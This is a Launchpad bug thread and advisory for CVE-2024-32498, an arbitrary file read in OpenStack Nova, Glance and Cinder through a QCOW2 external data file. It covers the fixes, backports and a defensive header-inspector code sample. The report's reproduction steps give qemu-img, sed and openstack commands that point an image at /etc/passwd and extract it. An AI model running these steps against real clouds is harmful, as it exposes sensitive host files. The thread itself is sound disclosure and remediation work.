[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

Bug #2059809 reported by Martin Kaesberger
Affects                      Status         Importance  Assigned to
Cinder                       Fix Released   Critical    Brian Rosmaita
Glance                       Fix Released   Critical    Dan Smith
OpenStack Compute (nova)     Fix Released   Critical    Sylvain Bauza
OpenStack Security Advisory  Fix Released   High        Jeremy Stanley
Ubuntu Cloud Archive         Fix Released   Undecided   Unassigned
  Antelope                   Fix Released   Undecided   Unassigned
  Bobcat                     Fix Released   Undecided   Unassigned
  Caracal                    Fix Released   Undecided   Unassigned
  Ussuri                     Fix Committed  Undecided   Unassigned
  Yoga                       Fix Released   Undecided   Unassigned

Bug Description

OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

Steps to Reproduce:

- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

With the non-bootable instance there might be two ways to continue:

Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0

Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Since this report concerns a possible security risk, an incomplete
security advisory task has been added while the core security
reviewers for the affected project or projects confirm the bug and
discuss the scope of any vulnerability along with potential
solutions.

description: updated
Changed in ossa:
status: New → Incomplete
Revision history for this message
Jeremy Stanley (fungi) wrote :

My initial impression is that this seems like a fairly similar situation to https://security.openstack.org/ossa/OSSA-2023-002.html in which case we may want to involve the Cinder and Glance security reviewers too, but we'll start with Nova and see where it leads.

Revision history for this message
Dan Smith (danms) wrote :

It's also similar to an earlier one specifically referring to qcow files. We currently protect against the backing file of a qcow pointing somewhere, but it looks like this data_file option provides another route to get similar functionality. We will probably need similar mitigations in the same area we currently have them for backing files in nova, glance, and cinder.

Revision history for this message
Dan Smith (danms) wrote (last edit):

We're also all (I think) now using oslo.utils/imageutils to probe the qcow files. AFAICT, that does not expose the general list of extra options, so we'll need to augment oslo.utils as well.

EDIT: Yeah, it does, under "format-specific"

Revision history for this message
Dan Smith (danms) wrote :

Proposed patch to nova to detect and reject qcow2 images with data-file set

Revision history for this message
Dan Smith (danms) wrote :

Proposed patch to glance to detect and reject qcow2 images with data-file set

Revision history for this message
Dan Smith (danms) wrote :

I subscribed Brian Rosmaita who can evaluate the cinder impact and also review the glance patch.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Added Eric Harney for cinder.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Guess I should state explicitly that this also affects cinder, when it converts an image to raw format to write to a volume.

Revision history for this message
Sylvain Bauza (sylvain-bauza) wrote :

I agree with the design proposal which is about not accepting an image with a data-file set.
Nova doesn't need to use an external disk for a guest, so we could no longer support it.

I'll look at Dan's patch today.

Revision history for this message
Sylvain Bauza (sylvain-bauza) wrote :

Nova's patch proposed by Dan relies on the same mitigation provided in https://security.openstack.org/ossa/OSSA-2023-002.html, where we rely on metadata that was added in oslo.utils's imageutils.py module by https://github.com/openstack/oslo.utils/commit/2180db82b605cf84902ee379fffc0b34e17e92c7

This sounds to me like the correct approach, as we can backport it down to the last Maintained releases, but any distro can also backport it further down to Ussuri if they want (exactly like OSSA-2023-002).

+1 on nova-2059809.patch but I'll test it on a dev environment.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Martin Kaesberger: Did you notify any organizations about this other than reporting the bug to us? I just received a request from a public cloud provider for access to the bug report, which means the private embargo has been broken and we probably need to disclose this by switching to our public workflow immediately rather than continuing to work on it in private.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Updated cinder patch to include a release note.

Revision history for this message
Jeremy Stanley (fungi) wrote :

For now I'm subscribing some technical representatives from OVH (the provider on whose behalf I was contacted), on the assumption they were the only outside organization notified, so that they might assist with reviewing and testing the proposed fixes.

Revision history for this message
Martin Kaesberger (mkaesberger) wrote :

Jeremy Stanley: The reference to the production system in the report refers to the fact that it was discovered in OVHcloud. I reported it to them in private first and was referred here.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Thanks for confirming. In this case it seems like we should be able to continue working on this in private for now, with added assistance from folks at OVH.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Dan's glance-2059809.patch LGTM.

Changed in cinder:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Brian Rosmaita (brian-rosmaita)
Changed in glance:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Dan Smith (danms)
Changed in nova:
status: New → In Progress
Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2024.1

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2023.2

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2023.1

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for zed

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2024.1

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2023.2

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2023.1

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for zed

Revision history for this message
Eric Harney (eharney) wrote :

brian-rosmaita's cinder-2059809.patch from comment #16 looks good to me.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2024.1 (Caracal)

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2023.2 (Bobcat).

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2023.1 (Antelope)

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for Zed.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for unmaintained/yoga, as a courtesy.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

@arnaud-morin: would you mind deleting your patches so that people don't get confused? Thanks!

Revision history for this message
Jeremy Stanley (fungi) wrote :

Martin Kaesberger: If there's any organization you're affiliated with and you'd like it credited along with your name, please let me know.

Here's a draft impact description; a quick review for any inaccuracies is appreciated so I can request a CVE assignment with it...

title: Arbitrary file access through custom QCOW2 external data

description: >
  Martin Kaesberger reported a vulnerability in QCOW2 image processing for
  Cinder, Glance and Nova. By supplying a specially created QCOW2 image which
  references a specific data file path, an authenticated user may convince
  systems to return a copy of that file's contents from the server resulting in
  unauthorized access to potentially sensitive data. All Cinder deployments are
  affected; only Glance deployments with image conversion enabled are affected;
  all Nova deployments are affected.

affected-products:
  - product: Cinder
    version: '<21.3.3, >=22.0.0 <22.1.2, >=23.0.0 <23.1.1, ==24.0.0'
  - product: Glance
    version: '<25.1.1, ==26.0.0, ==27.0.0, >=28.0.0 <28.0.2'
  - product: Nova
    version: '<26.2.3, >=27.0.0 <27.2.1, >=28.0.0 <28.0.2, >=29.0.0 <29.0.2'

Jeremy Stanley (fungi)
Changed in ossa:
status: Incomplete → Confirmed
importance: Undecided → High
assignee: nobody → Jeremy Stanley (fungi)
status: Confirmed → Triaged
Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Draft description LGTM, and the version lists check out.

Jeremy Stanley (fungi)
Changed in ossa:
status: Triaged → In Progress
Jeremy Stanley (fungi)
summary: - Arbitrary file access through QCOW2 external data file
+ Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
Jeremy Stanley (fungi)
description: updated
Changed in nova:
importance: Undecided → Critical
assignee: nobody → Sylvain Bauza (sylvain-bauza)
Jeremy Stanley (fungi)
summary: - Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
+ [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
+ (CVE-2024-32498)
Jeremy Stanley (fungi)
description: updated
information type: Private Security → Public Security
Changed in ossa:
status: In Progress → Fix Released
Changed in nova:
status: In Progress → Fix Released
Changed in cinder:
status: In Progress → Fix Released
Changed in glance:
status: In Progress → Fix Released
tags: added: in-unmaintained-zed
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923724
Committed: https://opendev.org/openstack/nova/commit/eeda7c333c773216c216159926673874ce4843ba
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit eeda7c333c773216c216159926673874ce4843ba
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (master)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923924
Committed: https://opendev.org/openstack/nova/commit/c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Submitter: "Zuul (22348)"
Branch: master

commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some versions of mkisofs do not properly handle the case where both the
    input and the output file of the command are the same. So this commit
    changes the unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923935
Committed: https://opendev.org/openstack/nova/commit/a8783a767551df3dd943bd862cdba35c51cdb7a6
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit a8783a767551df3dd943bd862cdba35c51cdb7a6
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some versions of mkisofs do not properly handle the case where both the
    input and the output file of the command are the same. So this commit
    changes the unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923729
Committed: https://opendev.org/openstack/nova/commit/24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to nova (unmaintained/yoga)

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924081

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924082

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/yoga)

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924084

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923936
Committed: https://opendev.org/openstack/nova/commit/02147b36d35e1e462e1405c36a2e67a33de806de
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 02147b36d35e1e462e1405c36a2e67a33de806de
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some versions of mkisofs do not properly handle the case where both the
    input and the output file of the command are the same. So this commit
    changes the unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923733
Committed: https://opendev.org/openstack/nova/commit/65f0789df05e2ba7f11c0eaf2c6959367acbced2
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to cinder (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/cinder/+/923314
Committed: https://opendev.org/openstack/cinder/commit/4aa6590a483901de64e0d162fff11f3d2d7f9977
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 4aa6590a483901de64e0d162fff11f3d2d7f9977
Author: Brian Rosmaita <email address hidden>
Date: Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance. This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes. It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files. Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size available without actually changing
    the size value in cinder. While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    Co-authored-by: Dan Smith <email address hidden>
    Co-authored-by: Felix Huettner <email address hidden>

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923937
Committed: https://opendev.org/openstack/nova/commit/47428f6caf503b94583dac614b59971f60a0ba9c
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 47428f6caf503b94583dac614b59971f60a0ba9c
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some versions of mkisofs do not properly handle the case where both the
    input and the output file of the command are the same. So this commit
    changes the unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923304
Committed: https://opendev.org/openstack/glance/commit/6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Author: Dan Smith <email address hidden>
Date: Mon Apr 1 08:06:31 2024 -0700

    Reject qcow files with data-file attributes

    Change-Id: I6326a3e85c1ba4cb1da944a4323769f2399ed2c1
    Closes-Bug: #2059809
    (cherry picked from commit 2ca29af4433e9fa99a0a48e230d8d25d6eaa4a87)
    (cherry picked from commit c3586f3a122f6cb0663217b12b52203e74e2e4fa)
    (cherry picked from commit a92c438fb5ba55440b38cae7c8b4361b58daa9dd)
    (cherry picked from commit dba3bdb458aa8a5d0193f12b7f1e374a89ed34a2)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923305
Committed: https://opendev.org/openstack/glance/commit/f32d5b8ad865113d499a36f7507a085f583514f9
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit f32d5b8ad865113d499a36f7507a085f583514f9
Author: Dan Smith <email address hidden>
Date: Tue Apr 16 10:29:10 2024 -0700

    Extend format_inspector for QCOW safety

    This adds two properties to the QcowInspector that make it able to
    indicate whether the file specifies a backing_file or data_file in the
    header. Both conditions are considered unsafe for our usage. To
    ease checking of this condition, a classmethod is added that takes
    a local filename and digests just enough of the file to assert that
    both conditions are false.

    Change-Id: Iaf86b525397d41bd116999cabe0954a0a7efac65
    Related-Bug: #2059809
    (cherry picked from commit ae536bb394793c9a7a219cb498e03d5c81dbbbb7)
    (cherry picked from commit 2eba54e0821106097dfeceb424e53943fd090483)
    (cherry picked from commit 89dbbc838d606f461087e1494d19ddbcf9db0a38)
    (cherry picked from commit 4860024286256b028fabc5ed50274934c3dfdd8a)
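As an added example (not code from this page, from Glance, or from the format_inspector module the commit above describes), here is a stand-alone Python inspector that parses just enough of a QCOW2 header to report the two references that commit treats as unsafe: a backing file and an external data file (the mechanism behind this report). The `build_header` helper, the names `base.qcow2` and `external.raw`, and the sample images it produces are constructed here for illustration and are not images from the report.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
FIXED_HEADER = ">4sIQIIQIIQQIIQ"      # v2 header fields, 72 bytes, big-endian
V3_HEADER = ">QQQII"                  # v3 fields at offset 72, 32 bytes
EXT_END = 0x00000000                  # end-of-extensions marker
EXT_DATA_FILE = 0x44415441            # "DATA": external data file name string
INCOMPAT_DATA_FILE = 1 << 2           # incompatible_features bit 2: external data file
AUTOCLEAR_DATA_FILE_RAW = 1 << 1      # autoclear_features bit 1: data_file_raw=on


def _header_extensions(data, start):
    """Walk the header extension table; entries are 8-byte aligned, ended by EXT_END."""
    exts, off = {}, start
    while True:
        if off + 8 > len(data):
            raise ValueError("truncated header extension table")
        ext_type, ext_len = struct.unpack_from(">II", data, off)
        if ext_type == EXT_END:
            return exts
        payload = data[off + 8:off + 8 + ext_len]
        if len(payload) != ext_len:
            raise ValueError("truncated header extension payload")
        exts[ext_type] = payload
        off += 8 + ((ext_len + 7) & ~7)


def inspect_qcow2_header(data):
    """Return the external references a QCOW2 header declares, without calling qemu-img."""
    if len(data) < 72 or data[:4] != QCOW2_MAGIC:
        raise ValueError("not a QCOW2 header")
    (_, version, backing_off, backing_len, _cluster_bits, size,
     _crypt, _l1n, _l1off, _rcoff, _rcn, _snaps, _snapoff) = struct.unpack_from(FIXED_HEADER, data)
    incompat = autoclear = 0
    ext_start = 72                    # v2 headers place extensions right after the fixed part
    if version == 3:
        if len(data) < 104:
            raise ValueError("truncated v3 header")
        incompat, _compat, autoclear, _order, ext_start = struct.unpack_from(V3_HEADER, data, 72)
    elif version != 2:
        raise ValueError("unsupported QCOW2 version %d" % version)
    backing = None
    if backing_off:                   # non-zero offset means a backing file name is present
        raw = data[backing_off:backing_off + backing_len]
        if len(raw) != backing_len:
            raise ValueError("truncated backing file name")
        backing = raw.decode("utf-8", "replace")
    exts = _header_extensions(data, ext_start)
    data_name = exts.get(EXT_DATA_FILE)
    return {
        "version": version,
        "virtual_size": size,
        "backing_file": backing,
        "data_file": data_name.decode("utf-8", "replace") if data_name is not None else None,
        "data_file_flag": bool(incompat & INCOMPAT_DATA_FILE),
        "data_file_raw": bool(autoclear & AUTOCLEAR_DATA_FILE_RAW),
    }


def unsafe_references(data):
    """Reasons to reject an uploaded image: any path the header would make qemu open."""
    info = inspect_qcow2_header(data)
    reasons = []
    if info["backing_file"] is not None:
        reasons.append("backing_file=" + info["backing_file"])
    # The flag alone is enough to reject: a name-less flag is still a malformed, unsupported image.
    if info["data_file"] is not None or info["data_file_flag"]:
        reasons.append("data_file=" + (info["data_file"] or "<flag set, no name>"))
    return reasons


def build_header(version=3, backing=None, data_file=None, data_file_raw=False):
    """Constructed sample image (header plus one empty cluster); not produced by qemu-img."""
    cluster_bits = 16
    hdr_len = 104 if version == 3 else 72
    exts = b""
    if data_file is not None:
        name = data_file.encode()
        exts += struct.pack(">II", EXT_DATA_FILE, len(name)) + name + b"\0" * (-len(name) % 8)
    exts += struct.pack(">II", EXT_END, 0)
    backing_bytes = backing.encode() if backing is not None else b""
    backing_off = hdr_len + len(exts) if backing is not None else 0
    hdr = struct.pack(FIXED_HEADER, QCOW2_MAGIC, version, backing_off, len(backing_bytes),
                      cluster_bits, 1 << 30, 0, 1, 3 << cluster_bits, 1 << cluster_bits, 1, 0, 0)
    if version == 3:
        incompat = INCOMPAT_DATA_FILE if data_file is not None else 0
        autoclear = AUTOCLEAR_DATA_FILE_RAW if data_file_raw else 0
        hdr += struct.pack(V3_HEADER, incompat, 0, autoclear, 4, hdr_len)
    return (hdr + exts + backing_bytes).ljust(1 << cluster_bits, b"\0")


if __name__ == "__main__":
    for label, img in [("clean", build_header()),
                       ("backing", build_header(backing="base.qcow2")),
                       ("data_file", build_header(data_file="external.raw", data_file_raw=True))]:
        print(label, unsafe_references(img) or "ok")
```

The check reads only the first cluster, so it can run on an upload before any qemu-img call, which is the ordering the cinder and nova commits on this bug insist on.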

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/zed)

Related fix proposed to branch: unmaintained/zed
Review: https://review.opendev.org/c/openstack/nova/+/924241

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Related fix proposed to branch: unmaintained/zed
Review: https://review.opendev.org/c/openstack/nova/+/924243

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to cinder (unmaintained/xena)

Fix proposed to branch: unmaintained/xena
Review: https://review.opendev.org/c/openstack/cinder/+/925097

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to cinder (unmaintained/wallaby)

Fix proposed to branch: unmaintained/wallaby
Review: https://review.opendev.org/c/openstack/cinder/+/925098

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/nova/+/924241
Committed: https://opendev.org/openstack/nova/commit/e8f00617ed319aa37f6946cf10883eef6d180612
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit e8f00617ed319aa37f6946cf10883eef6d180612
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)
    (cherry picked from commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Reviewed: https://review.opendev.org/c/openstack/nova/+/924243
Committed: https://opendev.org/openstack/nova/commit/11613e7b3244958fa8d0b5253a185287d1ade2d8
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 11613e7b3244958fa8d0b5253a185287d1ade2d8
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some versions of mkisofs do not properly handle the case where both the
    input and the output file of the command are the same. So this commit
    changes the unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)
    (cherry picked from commit 47428f6caf503b94583dac614b59971f60a0ba9c)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/yoga)

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/925592

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/925594

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to nova (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/nova/+/924081
Committed: https://opendev.org/openstack/nova/commit/f844c8fe3ccbf5b477c007ac1d2e290c9d74f2e6
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit f844c8fe3ccbf5b477c007ac1d2e290c9d74f2e6
Author: Dan Smith <email address hidden>
Date: Mon Apr 1 07:32:11 2024 -0700

    Reject qcow files with data-file attributes

    Change-Id: Ic3fa16f55acc38cf6c1a4ac1dce4487225e66d04
    Closes-Bug: #2059809
    (cherry picked from commit ec9c55cbbc91d1f31e42ced289a7c82cf79dc2a2)
    (cherry picked from commit 58d933eafb3f7164419000700a305c8f75d5cb6e)
    (cherry picked from commit 736328f78fb88b6d567b94b50cd14b3ebef08a5e)
    (cherry picked from commit af4d819c606d6662d0b086365a51f5220b596e48)
    (cherry picked from commit d69d441cf5d82f69d8ed7d555a6af73624866400)

tags: added: in-unmaintained-yoga
Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Reviewed: https://review.opendev.org/c/openstack/nova/+/924082
Committed: https://opendev.org/openstack/nova/commit/b8a3d56f2e27531cc735606fbe92b648a51e8d62
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit b8a3d56f2e27531cc735606fbe92b648a51e8d62
Author: Dan Smith <email address hidden>
Date: Wed Apr 17 07:06:13 2024 -0700

    Check images with format_inspector for safety

    It has been asserted that we should not be calling qemu-img info
    on untrusted files. That means we need to know if they have a
    backing_file, data_file or other unsafe configuration *before* we use
    qemu-img to probe or convert them.

    This grafts glance's format_inspector module into nova/images so we
    can use it to check the file early for safety. The expectation is that
    this will be moved to oslo.utils (or something) later and thus we will
    just delete the file from nova and change our import when that happens.

    NOTE: This includes whitespace changes from the glance version of
    format_inspector.py because of autopep8 demands.

    Conflicts:
      nova/conf/workarounds.py

    NOTE(elod.illes): conflict is due to the following patch that is only
    present in zed: Iab92124b5776a799c7f90d07281d28fcf191c8fe

    Change-Id: Iaefbe41b4c4bf0cf95d8f621653fdf65062aaa59
    Closes-Bug: #2059809
    (cherry picked from commit 9cdce715945619fc851ab3f43c97fab4bae4e35a)
    (cherry picked from commit f07fa55fd86726eeafcd4c0c687bc49dd4df9f4c)
    (cherry picked from commit 0acf5ee7b5dfb6ff0f9a9745f5ad2a0ed2bf65bf)
    (cherry picked from commit 67e5376dd64407f5aaf1ea5f8c896e356064a2c9)
    (cherry picked from commit da352edceb74dbd715268f94516503042b48cc90)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/nova/+/924084
Committed: https://opendev.org/openstack/nova/commit/3ba8ee16116e6a721413a382bbd4bcb68355cdf0
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit 3ba8ee16116e6a721413a382bbd4bcb68355cdf0
Author: Dan Smith <email address hidden>
